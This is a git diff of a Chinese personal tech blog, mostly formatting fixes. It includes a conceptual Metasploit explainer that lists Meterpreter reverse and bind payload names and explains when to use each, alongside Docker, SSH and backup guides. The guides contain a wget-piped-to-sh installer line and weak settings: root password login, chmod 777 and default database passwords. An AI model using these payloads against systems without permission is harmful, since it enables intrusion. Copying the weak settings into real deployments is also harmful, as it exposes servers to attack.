-> 首先目标先要执行初始的溢出漏洞会话连接,可能是 bind正向连接,或者反弹 reverse 连接。反射连接的时候加载dll链接文件,同时后台悄悄处理 dll 文件。其次Meterpreter核心代码初始化,通过 socket套接字建立一个TLS/1.0加密隧道并发送GET请求给Metasploit服务端。Metasploit服务端收到这个GET请求后就配置相应客户端。最后,Meterpreter加载扩展,所有的扩展被加载都通过TLS/1.0进行数据传输。
+> 首先目标先要执行初始的溢出漏洞会话连接,可能是 bind 正向连接,或者反弹 reverse 连接。反射连接的时候加载 dll 链接文件,同时后台悄悄处理 dll 文件。其次 Meterpreter 核心代码初始化,通过 socket 套接字建立一个 TLS/1.0 加密隧道并发送 GET 请求给 Metasploit 服务端。Metasploit 服务端收到这个 GET 请求后就配置相应客户端。最后,Meterpreter 加载扩展,所有的扩展被加载都通过 TLS/1.0 进行数据传输。
#### 漏洞利用(exploit)
-> 漏洞利用exploit,也就是我们常说的exp,他就是对漏洞进行攻击的代码。
+> 漏洞利用 exploit,也就是我们常说的 exp,他就是对漏洞进行攻击的代码。
-exploit漏洞利用模块路径(这里面有针对不同平台的exploit):
+exploit 漏洞利用模块路径(这里面有针对不同平台的 exploit):
```php
/usr/share/metasploit-framework/modules/exploits
@@ -404,52 +409,51 @@ exploit漏洞利用模块路径(这里面有针对不同平台的exploit):
#### 攻击载荷(payload)
-> Payload:Payload中包含攻击进入目标主机后需要在远程系统中运行的恶意代码,而在Metasploit中Payload是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。简而言之,这种漏洞利用模块可以访问目标系统,而其中的代码定义了Payload在目标系统中的行为。
+> Payload:Payload 中包含攻击进入目标主机后需要在远程系统中运行的恶意代码,而在 Metasploit 中 Payload 是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。简而言之,这种漏洞利用模块可以访问目标系统,而其中的代码定义了 Payload 在目标系统中的行为。
>
-> Shellcode:Shellcode是payload中的精髓部分,在渗透攻击时作为攻击载荷运行的一组机器指令。Shellcode通常用汇编语言编写。在大多数情况下,目标系统执行了shellcode这一组指令之后,才会提供一个命令行shell。
+> Shellcode:Shellcode 是 payload 中的精髓部分,在渗透攻击时作为攻击载荷运行的一组机器指令。Shellcode 通常用汇编语言编写。在大多数情况下,目标系统执行了 shellcode 这一组指令之后,才会提供一个命令行 shell。
-##### payload模块路径
+##### payload 模块路径
```php
/usr/share/metasploit-framework/modules/payloads
```
-##### Metasploit中的 Payload 模块主要有以下三种类型
+##### Metasploit 中的 Payload 模块主要有以下三种类型
-* Single:
+- Single:
- > 是一种完全独立的Payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非metasploit处理工具所捕捉到。
- >
-* Stager:
+ > 是一种完全独立的 Payload,而且使用起来就像运行 calc.exe 一样简单,例如添加一个系统用户或删除一份文件。由于 Single Payload 是完全独立的,因此它们有可能会被类似 netcat 这样的非 metasploit 处理工具所捕捉到。
- > 这种Payload 负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条 tcp 连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
- >
-* Stage:
+- Stager:
- > 是Stager Payload下的一种Payload组件,这种Payload可以提供更加高级的功能,而且没有大小限制。
- >
+ > 这种 Payload 负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的 Stager Payload 就是 reverse_tcp,它可以让目标系统与攻击者建立一条 tcp 连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是 bind_tcp,它可以让目标系统开启一个 tcp 监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
-##### 几种常见的payload
+- Stage:
-* 正向连接
+ > 是 Stager Payload 下的一种 Payload 组件,这种 Payload 可以提供更加高级的功能,而且没有大小限制。
+
+##### 几种常见的 payload
+
+- 正向连接
```bash
windows/meterpreter/bind_tcp
```
-* 反向连接
+- 反向连接
```bash
windows/meterpreter/reverse_tcp
```
-* 过监听80端口反向连接
+- 过监听 80 端口反向连接
```bash
windows/meterpreter/reverse_http
```
-* 通过监听443端口反向连接
+- 通过监听 443 端口反向连接
```bash
windows/meterpreter/reverse_https
@@ -457,15 +461,14 @@ exploit漏洞利用模块路径(这里面有针对不同平台的exploit):
##### **使用场景**
-* 正向连接使用场景:
+- 正向连接使用场景:
- > 我们的攻击机在内网环境,被攻击机是外网环境,由于被攻击机无法主动连接到我们的主机,所以就必须我们主动连接被攻击机了。但是这里经常遇到的问题是,被攻击机上开了防火墙,只允许访问指定的端口,比如被攻击机只对外开放了80端口。那么,我们就只能设置正向连接80端口了,这里很有可能失败,因为80端口上的流量太多了。
- >
-* 反向连接使用场景:
+ > 我们的攻击机在内网环境,被攻击机是外网环境,由于被攻击机无法主动连接到我们的主机,所以就必须我们主动连接被攻击机了。但是这里经常遇到的问题是,被攻击机上开了防火墙,只允许访问指定的端口,比如被攻击机只对外开放了 80 端口。那么,我们就只能设置正向连接 80 端口了,这里很有可能失败,因为 80 端口上的流量太多了。
+
+- 反向连接使用场景:
> 我们的主机和被攻击机都是在外网或者都是在内网,这样被攻击机就能主动连接到我们的主机了。如果是这样的情况,建议使用反向连接,因为反向连接的话,即使被攻击机开了防火墙也没事,防火墙只是阻止进入被攻击机的流量,而不会阻止被攻击机主动向外连接的流量。
- >
-* 反向连接80和443端口使用场景:
- > 被攻击机能主动连接到我们的主机,还有就是被攻击机的防火墙设置的特别严格,就连被攻击机访问外部网络的流量也进行了严格的限制,只允许被攻击机的80端口或443端口与外部通信。
- >
\ No newline at end of file
+- 反向连接 80 和 443 端口使用场景:
+
+ > 被攻击机能主动连接到我们的主机,还有就是被攻击机的防火墙设置的特别严格,就连被攻击机访问外部网络的流量也进行了严格的限制,只允许被攻击机的 80 端口或 443 端口与外部通信。
diff --git a/src/content/技术日志/docker/Docker安装typecho.md b/src/content/技术日志/docker/Docker安装typecho.md
index 380ceaf..a2e3607 100644
--- a/src/content/技术日志/docker/Docker安装typecho.md
+++ b/src/content/技术日志/docker/Docker安装typecho.md
@@ -32,21 +32,21 @@ tags: ["Docker-compose"]
构建 PHP 容器,安装 PDO_MySQL 扩展并配置 PHP.ini:
- ```dockerfile
- FROM php:fpm
+ ```dockerfile
+ FROM php:fpm
- # 更新包列表并安装 pdo_mysql 扩展
- RUN apt-get update && \
- apt-get install -y libpq-dev && \
- docker-php-ext-install pdo_mysql && \
- rm -rf /var/lib/apt/lists/*
+ # 更新包列表并安装 pdo_mysql 扩展
+ RUN apt-get update && \
+ apt-get install -y libpq-dev && \
+ docker-php-ext-install pdo_mysql && \
+ rm -rf /var/lib/apt/lists/*
- # 设置 PHP 配置
- RUN { \
- echo "output_buffering = 4096"; \
- echo "date.timezone = PRC"; \
- } > /usr/local/etc/php/conf.d/custom.ini
- ```
+ # 设置 PHP 配置
+ RUN { \
+ echo "output_buffering = 4096"; \
+ echo "date.timezone = PRC"; \
+ } > /usr/local/etc/php/conf.d/custom.ini
+ ```
2. **Nginx 服务器配置**
@@ -54,41 +54,41 @@ tags: ["Docker-compose"]
Nginx 服务器配置文件,包括服务器监听、根目录设置、重写规则和 PHP 处理:
- ```nginx
- server {
- listen 80 default_server; # 监听 80 端口
- root /var/www/html; # 网站根目录
- index index.php index.html index.htm;
+ ```nginx
+ server {
+ listen 80 default_server; # 监听 80 端口
+ root /var/www/html; # 网站根目录
+ index index.php index.html index.htm;
- access_log /var/log/nginx/typecho_access.log main; # 访问日志
- if (!-e $request_filename) {
- rewrite ^(.*)$ /index.php$1 last; # 重写 URL 到 index.php
- }
+ access_log /var/log/nginx/typecho_access.log main; # 访问日志
+ if (!-e $request_filename) {
+ rewrite ^(.*)$ /index.php$1 last; # 重写 URL 到 index.php
+ }
- location / {
- if (!-e $request_filename) {
- rewrite . /index.php last; # 如果文件不存在,重写到 index.php
- }
- }
+ location / {
+ if (!-e $request_filename) {
+ rewrite . /index.php last; # 如果文件不存在,重写到 index.php
+ }
+ }
- location ~ \.php(.*)$ {
- fastcgi_pass php:9000; # 转发 PHP 请求到 php-fpm 服务
- fastcgi_index index.php;
- fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; # 设置脚本文件名参数
- include fastcgi_params; # 包含 fastcgi 参数
- }
- }
- ```
+ location ~ \.php(.*)$ {
+ fastcgi_pass php:9000; # 转发 PHP 请求到 php-fpm 服务
+ fastcgi_index index.php;
+ fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; # 设置脚本文件名参数
+ include fastcgi_params; # 包含 fastcgi 参数
+ }
+ }
+ ```
3. **Typecho 源代码部署**
创建 `./data` 文件夹,并将 [Typecho](https://github.com/typecho/typecho/releases) 源代码放入此文件夹。
- docker容器不以root权限运行,无法访问文件,需要赋权
+ docker 容器不以 root 权限运行,无法访问文件,需要赋权
- ```bash
- chmod -R 777 data
- ```
+ ```bash
+ chmod -R 777 data
+ ```
4. **Docker Compose 配置**
@@ -98,52 +98,51 @@ tags: ["Docker-compose"]
可自行更改
- * nginx 中的端口,默认为`9757`
- * MySQL中的 root的密码 和 需要创建的数据库名称,默认都为`typecho`
+ - nginx 中的端口,默认为`9757`
+ - MySQL 中的 root 的密码 和 需要创建的数据库名称,默认都为`typecho`
- ```yaml
- services: # 定义多个服务
+ ```yaml
+ services: # 定义多个服务
+ nginx: # 服务名称
+ image: nginx # 使用的镜像
+ ports: # 映射的端口
+ - "9575:80" # 宿主机端口 9575 映射到容器端口 80
+ restart: always # 容器重启策略
+ volumes: # 映射文件
+ - ./data:/var/www/html # 网站源代码
+ - ./nginx/conf:/etc/nginx/conf.d # nginx 站点配置文件
+ - ./nginx/logs:/var/log/nginx # nginx 日志文件
+ depends_on: # 定义依赖关系
+ - php # 依赖 php 服务
+ networks: # 要加入的网络
+ - typecho # 加入 typecho 网络
- nginx: # 服务名称
- image: nginx # 使用的镜像
- ports: # 映射的端口
- - "9575:80" # 宿主机端口 9575 映射到容器端口 80
- restart: always # 容器重启策略
- volumes: # 映射文件
- - ./data:/var/www/html # 网站源代码
- - ./nginx/conf:/etc/nginx/conf.d # nginx 站点配置文件
- - ./nginx/logs:/var/log/nginx # nginx 日志文件
- depends_on: # 定义依赖关系
- - php # 依赖 php 服务
- networks: # 要加入的网络
- - typecho # 加入 typecho 网络
-
- php: # 服务名称
- build: ./php # 构建文件的目录
- restart: always # 容器重启策略
- volumes: # 映射文件
- - ./data:/var/www/html # 网站源代码
- depends_on: # 定义依赖关系
- - mysql # 依赖 mysql 服务
- networks: # 要加入的网络
- - typecho # 加入 typecho 网络
-
- mysql: # 服务名称
- image: mysql:5.7 # 指定 5.7 版本的 mysql 镜像
- restart: always # 容器重启策略
- volumes: # 要映射的文件
- - ./mysql/data:/var/lib/mysql # mysql 数据
- - ./mysql/logs:/var/log/mysql # mysql 日志
- - ./mysql/conf:/etc/mysql/conf.d # mysql 配置文件
- environment: # 环境变量
- MYSQL_ROOT_PASSWORD: typecho # MySQL root 用户的密码
- MYSQL_DATABASE: typecho # 创建的数据库名称
- networks: # 要加入的网络
- - typecho # 加入 typecho 网络
+ php: # 服务名称
+ build: ./php # 构建文件的目录
+ restart: always # 容器重启策略
+ volumes: # 映射文件
+ - ./data:/var/www/html # 网站源代码
+ depends_on: # 定义依赖关系
+ - mysql # 依赖 mysql 服务
+ networks: # 要加入的网络
+ - typecho # 加入 typecho 网络
- networks: # 定义的内部网络
- typecho: # 网络名称
- ```
+ mysql: # 服务名称
+ image: mysql:5.7 # 指定 5.7 版本的 mysql 镜像
+ restart: always # 容器重启策略
+ volumes: # 要映射的文件
+ - ./mysql/data:/var/lib/mysql # mysql 数据
+ - ./mysql/logs:/var/log/mysql # mysql 日志
+ - ./mysql/conf:/etc/mysql/conf.d # mysql 配置文件
+ environment: # 环境变量
+ MYSQL_ROOT_PASSWORD: typecho # MySQL root 用户的密码
+ MYSQL_DATABASE: typecho # 创建的数据库名称
+ networks: # 要加入的网络
+ - typecho # 加入 typecho 网络
+
+ networks: # 定义的内部网络
+ typecho: # 网络名称
+ ```
## 安装
@@ -157,34 +156,34 @@ docker compose up -d
如果修改过`docker-compose.yml`
-* 数据库地址: `mysql`
+- 数据库地址: `mysql`
```text
因为docker内部网络可以用过容器名访问
```
-* 数据库用户名: `root`
-* 数据库密码: `typecho`
-* 数据库名: `typecho`
-* 启用数据库 SSL 服务端证书验证: 关闭
-* 其他默认或随意
+- 数据库用户名: `root`
+- 数据库密码: `typecho`
+- 数据库名: `typecho`
+- 启用数据库 SSL 服务端证书验证: 关闭
+- 其他默认或随意
## 问题
-### 恢复直接用nginx+MySQL搭建的网站
+### 恢复直接用 nginx+MySQL 搭建的网站
-1. 将原来的文件放入data
+1. 将原来的文件放入 data
-2. 进入mysql容器,导入数据库文件
+2. 进入 mysql 容器,导入数据库文件
3. 在`docker-compose.yml`的环境变量中加入
- ```yaml
- MYSQL_USER=typecho # 原有 MySQL 用户名
- MYSQL_PASSWORD=typecho # 原有 MySQL 用户密码
- ```
+ ```yaml
+ MYSQL_USER=typecho # 原有 MySQL 用户名
+ MYSQL_PASSWORD=typecho # 原有 MySQL 用户密码
+ ```
-4. 进入mysql容器,将数据库赋权给原用户
+4. 进入 mysql 容器,将数据库赋权给原用户
### 排版错误
diff --git a/src/content/技术日志/docker/Docker部署gitea.md b/src/content/技术日志/docker/Docker部署gitea.md
index 11e0298..b687583 100644
--- a/src/content/技术日志/docker/Docker部署gitea.md
+++ b/src/content/技术日志/docker/Docker部署gitea.md
@@ -72,7 +72,7 @@ ssh -p 7222 -o StrictHostKeyChecking=no git@127.0.0.1 "SSH_ORIGINAL_COMMAND=\"$S
### 3. 创建`docker-compose.yml` 文件并配置
-> 将下面的USER_UID=1000 USER_GID=1000 换为得到uid 和 gid
+> 将下面的 USER_UID=1000 USER_GID=1000 换为得到 uid 和 gid
```yaml
version: "3"
@@ -149,3 +149,4 @@ server {
proxy_set_header X-Forwarded-Port $server_port;
}
}
+```
diff --git a/src/content/技术日志/docker/Docker部署思源笔记.md b/src/content/技术日志/docker/Docker部署思源笔记.md
index 483f238..4d8b8af 100644
--- a/src/content/技术日志/docker/Docker部署思源笔记.md
+++ b/src/content/技术日志/docker/Docker部署思源笔记.md
@@ -8,8 +8,8 @@ tags: ["Docker-compose"]
### 替换说明
-* 将 `/var/www/siyuan/` 替换为你的实际物理路径。
-* 将 `Password` 替换为你的访问密码。
+- 将 `/var/www/siyuan/` 替换为你的实际物理路径。
+- 将 `Password` 替换为你的访问密码。
```yaml
version: "3.9"
@@ -30,10 +30,10 @@ services:
## 反向代理配置
-### Nginx配置替换说明
+### Nginx 配置替换说明
-* 将 `your_domain.com` 替换为你自己的域名。
-* 将 `path` 替换为你的SSL证书的实际路径。
+- 将 `your_domain.com` 替换为你自己的域名。
+- 将 `path` 替换为你的 SSL 证书的实际路径。
```nginx
upstream siyuan {
@@ -78,3 +78,4 @@ server {
proxy_set_header Connection 'Upgrade'; # 支持 WebSocket
}
}
+```
diff --git a/src/content/技术日志/docker/密码管理器—Vaultwarden(bitwarden).md b/src/content/技术日志/docker/密码管理器—Vaultwarden(bitwarden).md
index 2b5d1a2..da205cb 100644
--- a/src/content/技术日志/docker/密码管理器—Vaultwarden(bitwarden).md
+++ b/src/content/技术日志/docker/密码管理器—Vaultwarden(bitwarden).md
@@ -2,7 +2,6 @@
title: "密码管理器—Vaultwarden(bitwarden)"
date: 2023-05-18T21:47:00+00:00
tags: ["Docker-compose"]
-
---
## 1. 安装 Vaultwarden
@@ -10,7 +9,7 @@ tags: ["Docker-compose"]
使用以下 `docker-compose.yml` 文件部署 Vaultwarden:
```yaml
-version: '3.8'
+version: "3.8"
services:
bitwarden:
image: vaultwarden/server:latest
@@ -34,10 +33,10 @@ services:
> **需要修改的参数**
>
-> 1. `ssl_certificate` : SSL证书路径
-> 2. `ssl_certificate_key` : SSL证书路径
-> 3. `server_name`: 跟你前面配置的domain相同,案例中为`b.lsy22.com`
-> 4. `proxy_pass` : 运行Vaultwarden的服务器地址和端口,比如本机为127.0.0.1:6666
+> 1. `ssl_certificate` : SSL 证书路径
+> 2. `ssl_certificate_key` : SSL 证书路径
+> 3. `server_name`: 跟你前面配置的 domain 相同,案例中为`b.lsy22.com`
+> 4. `proxy_pass` : 运行 Vaultwarden 的服务器地址和端口,比如本机为 127.0.0.1:6666
```nginx
server {
@@ -47,10 +46,10 @@ server {
listen [::]:443 ssl http2;
server_name b.lsy22.com; # 将 your_domain.com 替换为您的域名
-
+
ssl_certificate /root/.acme.sh/b.lsy22.com/fullchain.cer; # 填入SSL证书路径
ssl_certificate_key /root/.acme.sh/b.lsy22.com/b.lsy22.com.key;# 填入SSL证书路径
-
+
location / {
proxy_pass http://127.0.0.1:6666;
proxy_http_version 1.1;
diff --git a/src/content/技术日志/docker/网盘直链程序—AList.md b/src/content/技术日志/docker/网盘直链程序—AList.md
index 6c78eda..4652095 100644
--- a/src/content/技术日志/docker/网盘直链程序—AList.md
+++ b/src/content/技术日志/docker/网盘直链程序—AList.md
@@ -1,25 +1,25 @@
---
title: "网盘直链程序—AList"
date: 2023-05-26T20:21:00+00:00
-tags: ["Docker-compose","WebDAV"]
+tags: ["Docker-compose", "WebDAV"]
---
## 1. 项目展示
-- **GitHub项目地址**:[Alist on GitHub](https://github.com/Xhofe/alist)
-- **Demo演示站点**:[访问Demo](https://alist.nn.ci)
-- **Alist文档地址**:[阅读文档](https://alist-doc.nn.ci/en/)
+- **GitHub 项目地址**:[Alist on GitHub](https://github.com/Xhofe/alist)
+- **Demo 演示站点**:[访问 Demo](https://alist.nn.ci)
+- **Alist 文档地址**:[阅读文档](https://alist-doc.nn.ci/en/)
-## 2. 搭建Docker
+## 2. 搭建 Docker
-- [Docker官方部署教程](https://docs.docker.com/engine/install/debian/)
+- [Docker 官方部署教程](https://docs.docker.com/engine/install/debian/)
-## 3. 搭建Alist
+## 3. 搭建 Alist
-运行以下Docker Compose文件进行Alist的安装:
+运行以下 Docker Compose 文件进行 Alist 的安装:
```yaml
-version: '3.8'
+version: "3.8"
services:
alist:
image: xhofe/alist:latest
@@ -31,12 +31,12 @@ services:
- "7777:5244"
```
-- **查看初始化密码**:运行`docker logs alist`命令,可以查看Alist的初始密码。
+- **查看初始化密码**:运行`docker logs alist`命令,可以查看 Alist 的初始密码。
- **更改密码建议**:建议更改一个自己能够记住的密码。
## 4. 配置反向代理
-配置Nginx反向代理,以便安全访问Alist站点:
+配置 Nginx 反向代理,以便安全访问 Alist 站点:
```nginx
server {
@@ -49,7 +49,7 @@ server {
ssl_certificate /root/.acme.sh/o.lsy22.com/fullchain.cer; # SSL证书路径
ssl_certificate_key /root/.acme.sh/o.lsy22.com/o.lsy22.com.key; # SSL密钥路径
-
+
location / {
proxy_pass http://127.0.0.1:7777/;
rewrite ^/(.*)$ /$1 break;
@@ -72,15 +72,15 @@ server {
## 6. 挂载配置
- **挂载路径**:`/`
-- **根目录路径**:`/opt/alist/data/`对应VPS上的`/www/wwwroot/alist`目录。
+- **根目录路径**:`/opt/alist/data/`对应 VPS 上的`/www/wwwroot/alist`目录。
如果需要进一步的目录细分,可以设置路径为`/opt/alist/data/Userdata/`,在`/www/wwwroot/alist`下创建`Userdata`文件夹,并存放文件。
-- **其他网盘添加方式**:请参考[Alist文档](https://alist-doc.nn.ci/en/)
+- **其他网盘添加方式**:请参考[Alist 文档](https://alist-doc.nn.ci/en/)
-## 7. 更新Alist
+## 7. 更新 Alist
-若需更新Alist,请按以下步骤操作:
+若需更新 Alist,请按以下步骤操作:
1. **停止容器**:运行`docker stop alist`
2. **删除容器**:运行`docker rm -f alist`(此操作不会删除数据)
diff --git a/src/content/技术日志/linux/Linux美化终端zsh+ohmyzsh.md b/src/content/技术日志/linux/Linux美化终端zsh+ohmyzsh.md
index 66eb2b2..ef5ae29 100644
--- a/src/content/技术日志/linux/Linux美化终端zsh+ohmyzsh.md
+++ b/src/content/技术日志/linux/Linux美化终端zsh+ohmyzsh.md
@@ -42,20 +42,19 @@ sh -c "$(wget https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/ins
### 主题
-* [powerlevel10k](https://github.com/romkatv/powerlevel10k)
+- [powerlevel10k](https://github.com/romkatv/powerlevel10k)
### 插件
-* [zsh-autosuggestions](https://github.com/zsh-users/zsh-autosuggestions): 根据历史记录和完成情况在您输入时建议命令
-* [zsh-syntax-highlighting](https://github.com/zsh-users/zsh-syntax-highlighting): 输入命令时提供语法高亮
+- [zsh-autosuggestions](https://github.com/zsh-users/zsh-autosuggestions): 根据历史记录和完成情况在您输入时建议命令
+- [zsh-syntax-highlighting](https://github.com/zsh-users/zsh-syntax-highlighting): 输入命令时提供语法高亮
#### oh-my-zsh 自带插件
直接按照上述方法在 `.zshrc` 配置的 `plugins` 中加入即可:
-* [command-not-found](https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/command-not-found): 在 `zsh` 找不到命令时提供建议的安装包
-* [extract](https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/extract): 使用 `x` 命令解压任何压缩文件
-* [pip](https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/pip): 为 `python` 包管理器 `pip` 提供补全
-* [docker](https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/docker): 为 `docker` 命令添加自动补全支持
-* [docker-compose](https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/docker-compose): 为 `docker-compose` 命令添加自动补全支持
-
\ No newline at end of file
+- [command-not-found](https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/command-not-found): 在 `zsh` 找不到命令时提供建议的安装包
+- [extract](https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/extract): 使用 `x` 命令解压任何压缩文件
+- [pip](https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/pip): 为 `python` 包管理器 `pip` 提供补全
+- [docker](https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/docker): 为 `docker` 命令添加自动补全支持
+- [docker-compose](https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/docker-compose): 为 `docker-compose` 命令添加自动补全支持
diff --git a/src/content/技术日志/linux/SSH使用小技巧.md b/src/content/技术日志/linux/SSH使用小技巧.md
index 84cd36f..ca88da5 100644
--- a/src/content/技术日志/linux/SSH使用小技巧.md
+++ b/src/content/技术日志/linux/SSH使用小技巧.md
@@ -4,86 +4,86 @@ date: 2024-06-30T23:46:05+08:00
tags: []
---
-## 更改root密码
+## 更改 root 密码
> 将`password`更改为所需的密码
1. 修改密码
- ```bash
- echo root:`password` |sudo chpasswd root
- ```
+ ```bash
+ echo root:`password` |sudo chpasswd root
+ ```
-2. 开启root登录
+2. 开启 root 登录
- ```bash
- sudo sed -i 's/^#\?PermitRootLogin.*/PermitRootLogin yes/g' /etc/ssh/sshd_config;
- ```
+ ```bash
+ sudo sed -i 's/^#\?PermitRootLogin.*/PermitRootLogin yes/g' /etc/ssh/sshd_config;
+ ```
3. 开启密码登录
- ```bash
- sudo sed -i 's/^#\?PasswordAuthentication.*/PasswordAuthentication yes/g' /etc/ssh/sshd_config;
- ```
+ ```bash
+ sudo sed -i 's/^#\?PasswordAuthentication.*/PasswordAuthentication yes/g' /etc/ssh/sshd_config;
+ ```
-4. 重启ssh服务
+4. 重启 ssh 服务
- ```bash
- systemctl restart sshd.service
- ```
+ ```bash
+ systemctl restart sshd.service
+ ```
## 配置使用密钥登录
1. 生成密钥和公钥,请执行以下命令:
- ```bash
- ssh-keygen -t rsa -b 4096
- ```
+ ```bash
+ ssh-keygen -t rsa -b 4096
+ ```
> 连续执行回车即可生成密钥和公钥对。如果需要设置密码,请在密码提示处输入密码。
-2. 安装ssh公钥
+2. 安装 ssh 公钥
- ```bash
- cp "$HOME/.ssh/id_rsa.pub" "$HOME/.ssh/authorized_keys"
- ```
+ ```bash
+ cp "$HOME/.ssh/id_rsa.pub" "$HOME/.ssh/authorized_keys"
+ ```
3. 设置公钥权限
- ```bash
- chmod 600 "$HOME/.ssh/authorized_keys"
- chmod 700 "$HOME/.ssh"
- ```
+ ```bash
+ chmod 600 "$HOME/.ssh/authorized_keys"
+ chmod 700 "$HOME/.ssh"
+ ```
-4. ssh配置文件
+4. ssh 配置文件
1. 开启密钥登录
- ```bash
- sudo sed -i 's/^#\?PubkeyAuthentication.*/PubkeyAuthentication yes/g' /etc/ssh/sshd_config
- ```
+ ```bash
+ sudo sed -i 's/^#\?PubkeyAuthentication.*/PubkeyAuthentication yes/g' /etc/ssh/sshd_config
+ ```
2. 关闭密码登录
- ```bash
- sudo sed -i 's/^#\?PasswordAuthentication.*/PasswordAuthentication no/g' /etc/ssh/sshd_config
- ```
+ ```bash
+ sudo sed -i 's/^#\?PasswordAuthentication.*/PasswordAuthentication no/g' /etc/ssh/sshd_config
+ ```
-5. 重启sshd服务
+5. 重启 sshd 服务
- ```bash
- systemctl restart sshd.service
- ```
+ ```bash
+ systemctl restart sshd.service
+ ```
-## ssh登录后闲置时间过长而断开连接
+## ssh 登录后闲置时间过长而断开连接
```bash
echo "ServerAliveInterval 60" >> "$HOME/.ssh/config"
```
-> ssh客户端会每隔一段60s,自动与ssh服务器通信一次
+> ssh 客户端会每隔一段 60s,自动与 ssh 服务器通信一次
-## 存放ssh密钥密码
+## 存放 ssh 密钥密码
### 启动`ssh-agent`
diff --git a/src/content/技术日志/linux/linux实现定时备份网站到网盘.md b/src/content/技术日志/linux/linux实现定时备份网站到网盘.md
index 8ac0554..9102652 100644
--- a/src/content/技术日志/linux/linux实现定时备份网站到网盘.md
+++ b/src/content/技术日志/linux/linux实现定时备份网站到网盘.md
@@ -4,41 +4,41 @@ date: 2024-05-03T20:32:15+08:00
tags: []
---
-## 安装bypy
+## 安装 bypy
### 安装 pip 和虚拟环境
1. 安装虚拟环境创建工具:
- ```bash
- sudo apt-get install python3-venv -y
- ```
+ ```bash
+ sudo apt-get install python3-venv -y
+ ```
2. 创建一个新的虚拟环境:
- ```bash
- python3 -m venv "/var/script/venv"
- ```
+ ```bash
+ python3 -m venv "/var/script/venv"
+ ```
3. 激活虚拟环境:
- ```bash
- source "/var/script/venv/bin/activate"
- ```
+ ```bash
+ source "/var/script/venv/bin/activate"
+ ```
4. 安装 Python 库
- 1. 安装 bypy:
+ 1. 安装 bypy:
- ```bash
- pip install bypy
- ```
+ ```bash
+ pip install bypy
+ ```
- 2. 安装 requests:
+ 2. 安装 requests:
- ```bash
- pip install requests
- ```
+ ```bash
+ pip install requests
+ ```
### bypy 设置
@@ -52,51 +52,51 @@ tags: []
##### bypy 基本操作
-* `bypy info`:查看空间使用信息。
-* `bypy list`:查看目录信息。
-* `bypy upload`:上传根目录所有文件。
-* `bypy downdir`:把云盘上的内容同步到本地。
-* `bypy compare`:比较本地当前目录和云盘根目录。
+- `bypy info`:查看空间使用信息。
+- `bypy list`:查看目录信息。
+- `bypy upload`:上传根目录所有文件。
+- `bypy downdir`:把云盘上的内容同步到本地。
+- `bypy compare`:比较本地当前目录和云盘根目录。
## 安装阿里网盘备份工具
-Github项目地址:[https://github.com/tickstep/aliyunpan](https://github.com/tickstep/aliyunpan)
+Github 项目地址:[https://github.com/tickstep/aliyunpan](https://github.com/tickstep/aliyunpan)
1. 下载工具包
- ```bash
- wget -P "/var/script" https://github.com/tickstep/aliyunpan/releases/download/v0.3.2/aliyunpan-v0.3.2-linux-amd64.zip -O "/var/script/aliyunpan.zip"
- ```
+ ```bash
+ wget -P "/var/script" https://github.com/tickstep/aliyunpan/releases/download/v0.3.2/aliyunpan-v0.3.2-linux-amd64.zip -O "/var/script/aliyunpan.zip"
+ ```
2. 解压工具包
- ```bash
- unzip "/var/script/aliyunpan.zip" -d "/var/script"
- ```
+ ```bash
+ unzip "/var/script/aliyunpan.zip" -d "/var/script"
+ ```
3. 删除压缩包
- ```bash
- rm "/var/script/aliyunpan.zip"
- ```
+ ```bash
+ rm "/var/script/aliyunpan.zip"
+ ```
4. 重命名工具包名
- ```bash
- mv "/var/script/$(ls "/var/script" | grep "aliyunpan")" "/var/script/aliyunpan"
- ```
+ ```bash
+ mv "/var/script/$(ls "/var/script" | grep "aliyunpan")" "/var/script/aliyunpan"
+ ```
5. 登录阿里云盘
- ```bash
- /var/script/aliyunpan/aliyunpan login
- ```
+ ```bash
+ /var/script/aliyunpan/aliyunpan login
+ ```
## Shell 备份脚本
> 将`数据路径`,`网站根目录名称`,`数据库名称`,`数据库用户名`,`数据库密码`改为自己的
-### 使用于只用docker-compose搭建,只需要备份文件,并上传到网盘
+### 使用于只用 docker-compose 搭建,只需要备份文件,并上传到网盘
```bash
#!/bin/bash
@@ -123,7 +123,7 @@ for item in "$web_path"/*; do
done
```
-### 适用于 mysql+nginx的网站,需要备份文件和数据库,并上传到网盘
+### 适用于 mysql+nginx 的网站,需要备份文件和数据库,并上传到网盘
```bash
#!/bin/bash
@@ -144,7 +144,7 @@ source ~/myvenv/bin/activate
for item in "${mysql_arry[@]}"; do
# 创建SQL备份
mysqldump -u $user -p$password ${item} > "${item}_${date_time}.sql"
-
+
# 检查是否有同名的网站目录
if [[ " ${web_arry[@]} " =~ " ${item} " ]]; then
# 切换到网站目录进行压缩
@@ -189,7 +189,7 @@ for item in "${web_arry[@]}"; do
done
```
-### 适用于 mysql+nginx的网站,需要备份文件和数据库
+### 适用于 mysql+nginx 的网站,需要备份文件和数据库
```bash
#!/bin/bash
@@ -198,7 +198,7 @@ web_path="/var/www" # 数据路径
web_arry=("alist" "bitwarden" "blog") # 网站根目录名称
